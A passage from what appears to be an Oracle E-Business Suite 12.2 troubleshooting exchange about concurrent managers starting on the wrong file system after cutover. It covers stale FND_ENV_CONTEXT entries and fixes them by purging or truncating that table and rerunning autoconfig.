Java(TM) SE Runtime Environment (build pap6470sr9fp10-20150708_01(SR9 FP10))

IBM J9 VM (build 2.6, JRE 1.7.0 AIX ppc64-64 Compressed References 20150701_255667 (JIT enabled, AOT enabled)

J9VM - R26_Java726_SR9_20150701_0050_B255667

JIT - tr.r11_20150626_95120.01

GC - R26_Java726_SR9_20150701_0050_B255667_CMPRSS

J9CL - 20150701_255667)

JCL - 20150628_01 based on Oracle jdk7u85-b15

/testapp/oracle/test/fs2/EBSapps/comn/util/jdk64/jre/bin]> cd /testapp/oracle/test/fs1/EBSapps/comn/util/jdk64/jre/bin

/testapp/oracle/test/fs1/EBSapps/comn/util/jdk64/jre/bin]> ./java -version

java version "1.7.0"

Java(TM) SE Runtime Environment (build pap6470sr9fp10-20150708_01(SR9 FP10))

IBM J9 VM (build 2.6, JRE 1.7.0 AIX ppc64-64 Compressed References 20150701_255667 (JIT enabled, AOT enabled)

J9VM - R26_Java726_SR9_20150701_0050_B255667

JIT - tr.r11_20150626_95120.01

GC - R26_Java726_SR9_20150701_0050_B255667_CMPRSS

J9CL - 20150701_255667)

JCL - 20150628_01 based on Oracle jdk7u85-b15

And now I know why :

autoconfig does not populate the fnd_env_context table, so the majority of parameters there refer to fs2.

So that's why we have this problem.

Tried to update context file version to a higher version. The same issue..

So, I guess to fix our issue we need to clean fnd_env_context somehow?

How can we recreate the autoconfig files and re-load fnd_env_context?

Any hints ? :)

Thanks!

We said:

INFO: The FND_ENV_CONTEXT table stores information about the environment variable names and values for each of the concurrent processes.

Action plan:

1) Run the "Purge Concurrent Requests and/or Manager Data" concurrent program with the necessary parameters to clear those records from fnd_env_context.
2) Stop the concurrent processing.
3) Run the Concurrent Manager Recovery Troubleshooting Wizard with the internal manager down, as detailed in the following document:
Concurrent Processing - Concurrent Manager Recovery Troubleshooting Wizard (Note 134007.1)
4) Start the concurrent processing.

Reference:
MAIN REF: Workflow Mailer Won't Start In Cloned Environment (Doc ID 1953629.1) -- this is for 12.1, but it seems applicable to 12.2 as well.
Concurrent Processing - Purge Concurrent Request and/or Manager Data Program (FNDCPPUR) (Doc ID 104282.1)

Be careful while running this program. Don't break any business rules (i.e., if there is a requirement to keep the concurrent request log and out files for 30 days, then you will need the approval of the business side for this...)

You can backup the following tables before running the conc program:

FND_CONCURRENT_REQUESTS
This table contains a complete history of all concurrent requests. It should ideally be kept at around 4-5k records and should be regularly purged as part of normal 'housekeeping' by running the standard FNDCPPUR program. This is a part of basic system administration, and it is recommended that, for the average instance, it be run every 30 days or so. Allowing the table (and others) to grow in size can affect performance.

FND_RUN_REQUESTS
When a user submits a report set, this table stores information about the reports in the report set and the parameter values for each report.

FND_CONC_REQUEST_ARGUMENTS
This table records arguments passed by the concurrent manager to each program it starts running.

FND_DUAL
This table records when requests do not update database tables.

FND_CONCURRENT_PROCESSES
This table records information about Oracle Applications and operating system processes.

FND_CONC_STAT_LIST
This table collects runtime performance statistics for concurrent requests.

FND_CONC_STAT_SUMMARY
This table contains the concurrent program performance statistics generated by the purge.

FND_ENV_CONTEXT
This table stores information about the environment variable names and values for each of the concurrent processes.

You said:

Last time, I managed to fix it (so the conc mgrs started on the correct file system) by updating s_contextserial to a value higher than the one in the database and re-running autoconfig.
select serial_number from FND_OAM_CONTEXT_FILES where status in ('S','F') and name not in
('METADATA','TEMPLATE') and ctx_type='A';

This time I am again having this issue after cutover.
This time, updating the context serial to a value higher than the one in the db is not helping.
autoconfig completes without any errors..
But the serial_number is 65, even though in the context file I set it to 70.
It's not changing after autoconfig.
Any hints? I am thinking of cleaning up fnd_oam_context_files?

We said:

I think there are some leftover values in the FND tables that affect some environment variables.. So, a wrong value in the FND tables.
Yes.. FND_ENV_CONTEXT may be the cause.

After taking your backup, you can try truncating FND_OAM_CONTEXT_FILES and running autoconfig afterwards (first on the db tier, then on the apps tier).. But what I recommend is the following;

INFO: The FND_ENV_CONTEXT table stores information about the environment variable names and values for each of the concurrent processes.

Action plan:
1) Run the "Purge Concurrent Requests and/or Manager Data" concurrent program with the necessary parameters to clear those records from fnd_env_context.
2) Stop the concurrent processing.
3) Run the Concurrent Manager Recovery Troubleshooting Wizard with the internal manager down, as detailed in the following document:
Concurrent Processing - Concurrent Manager Recovery Troubleshooting Wizard (Note 134007.1)
4) Start the concurrent processing.

Reference:
MAIN REF: Workflow Mailer Won't Start In Cloned Environment (Doc ID 1953629.1) -- this is for 12.1, but it seems applicable to 12.2 as well.
Concurrent Processing - Purge Concurrent Request and/or Manager Data Program (FNDCPPUR) (Doc ID 104282.1)

Solution / You Said:

Update and FYI:
We fixed the issue using the following action plan;

shutdown apps tier
truncate the applsys.fnd_env_context
run autoconfig on db+appstier
restart

Actually, it comes up now and then; the same issue sometimes appears after a lot of patching activities. Note that -> not every time..
So, it seems like some bug in EBS confuses this GSM thing, and it just starts on the wrong filesystem.
Take care!